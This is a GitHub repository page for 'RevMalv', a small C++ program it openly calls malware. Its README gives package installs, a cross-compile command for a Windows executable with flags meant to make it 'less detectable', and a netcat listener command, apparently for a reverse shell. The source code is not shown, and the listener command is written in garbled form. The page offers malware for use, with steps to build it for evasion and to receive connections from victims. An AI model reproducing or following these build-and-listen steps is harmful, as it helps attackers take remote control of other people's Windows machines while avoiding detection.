Skip to content

OnurLexa/RevMalv

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 

Repository files navigation

*** INSTALL REQUIREMENTS FOR COMPILE ***

// DEBIAN sudo apt install netcat sudo apt install g++mingw-w64-i686

// ARCH LINUX sudo pacman -S gnu-netcat sudo pacman -S mingw-w64-i686-gcc


// Compile the malware (RevMalv.cpp) into a lightweight and less detectable executable // By using flags to strip debugging symbols and statically link libraries


i686-w64-mingw32-g++ -std=c++11 RevMalv.cpp -o RevMalv.exe -s -lws2_32 -Wno-write-strings -static -static-libstdc++ -static-libgcc


*** NETCAT LISTENER *** // nc lvp -8080

  • nc = netcat
  • -lvp = listen-verbose-port
  • 8080 = port

About

An simple Malware, written on modern C++

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages